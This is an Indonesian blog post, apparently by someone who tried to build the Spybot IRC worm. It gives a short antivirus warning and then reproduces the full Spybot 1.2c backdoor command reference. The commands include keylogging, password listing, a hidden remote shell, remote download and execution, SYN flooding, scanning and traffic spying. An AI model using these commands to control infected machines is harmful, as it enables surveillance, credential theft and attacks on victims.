Spybot the friend or the enemy

Waspada Terhadap Segala macam Virus, Worm, Serta Malware Yang Beredar Di Internet. Bukan hanya System yang akan di kuasai, tapi Akses Anda Ke Situs2 Akan Di kuasai.

Pasang AntiVirus dan perhatikan gerak-gerik aplikasi yang berjalan di komputer Anda.

pada tulisan sebelumnya Make Spybot dan karena ada kesalahan compiled errorlah hasil botnya.


spybot sedang beraksi dengan perintah startkeylogger

Spybot adalah jenis worm yang lengkapnya di deteksi oleh Antivirus Worm.P2P.SpyBot.R
Spybot dapat di bersihkan dengan HiJackThis, Ccleaner, serta Escan maupun antivirus yang biasanya terupdate.

Spybot menyerang target dan bila mendapatkan target/komputer yang telah di masukinya akan langsung menuju Irc, dimana alamat server dan channel sudah tersetting sebelumnya pada spybot.

Spybot selain dapat membuat httpserver dan spybot sendiri dapat menjalankan keylogger menjalankan sebuah program list perintah untuk spybot ada di bawah ini :
Commands list spybot1.2c

Login password
raw [raw command] (example: raw PRIVMSG #spybot1.1 :hello)
list [path+filter] (example: list c:\*.*)
delete [filename] (example: delete c:\windows\netstat.exe)
execute [filename]
rename [origenamfile] [newfile] (example: rename c:\windows\netstat.exe c:\windows\netstatbackup.bak)
makedir [dirname] (example: makedir c:\test\ )
startkeylogger (info: starts onlinekeylogger and output's to the channel\query\dcc chat)
stopkeylogger
sendkeys [keys] (info: simulates keypresses, to simulate return hit ctrl+b (bold in mIRC) and for backspace ctrl+u (underlined in mIRC))
keyboardlights (info: flashes his keyboard lights 50x)
info (info: gives some info)
passwords (info: lists the ras passwords in win 9x)
listprocesses (info: lists all running proccesses)
killprocess [processname] (example: killprocess taskmgr.exe) NOTE: if with listprocesses the entire path shows up you must use it with killprocess to)
reconnect
disconnect [sec.] (info: disconnect the bot for x sec. if sec. is not given it disconnect the bot for 30mins.)
quit (info: bot quits running)
reboot
cd-rom [0/1] (info: opens\close cd-rom. cd-rom 1 = open cd-rom 0 = close)
httpserver [port] [root-dir] (example: httpserver 81 c:\)
syn [host] [port] [delay msec.] [times] (example: syn 127.0.0.1 80 100 1000)
redirect [input port] [host] [output port] (example: redirect 100 eu.undernet.org 6667)
threads (info: will list al threads)
killthread [number] (info: kills the selected thread)
get [filename] (example: get c:\windows\system\keylogs.txt will trigger a dcc send on the remote pc)
opencmd (info: starts cmd.exe on the remote pc hidden)
cmd [command] (info: sends a command to cmd.exe example: cmd netstat -an)
scan [start ip address] [port] [delay] [filename]
example: scan 127.0.0.1 17300 1 portscan.txt
download [url] [filename] (example: download http://127.0.0.1/server.exe c:\server.exe)
server [new server address] (example: server 127.0.0.1)
uninstall (info: uninstalls server note: it doesnt delete the server only removes the startupkeys)
spy (info: redirects all travic from the irc server to the dcc chat (only works with dcc chat)
stopspy (info: stops the spy)
redirectspy (info: redirects all travic from the port redirect to the dcc chat (only works with dcc chat)

stopredirectspy (info: stops the port redirect spy)

Command list From : http://www.megasecurity.org/trojans/s/spybot/Spybot1.2c.html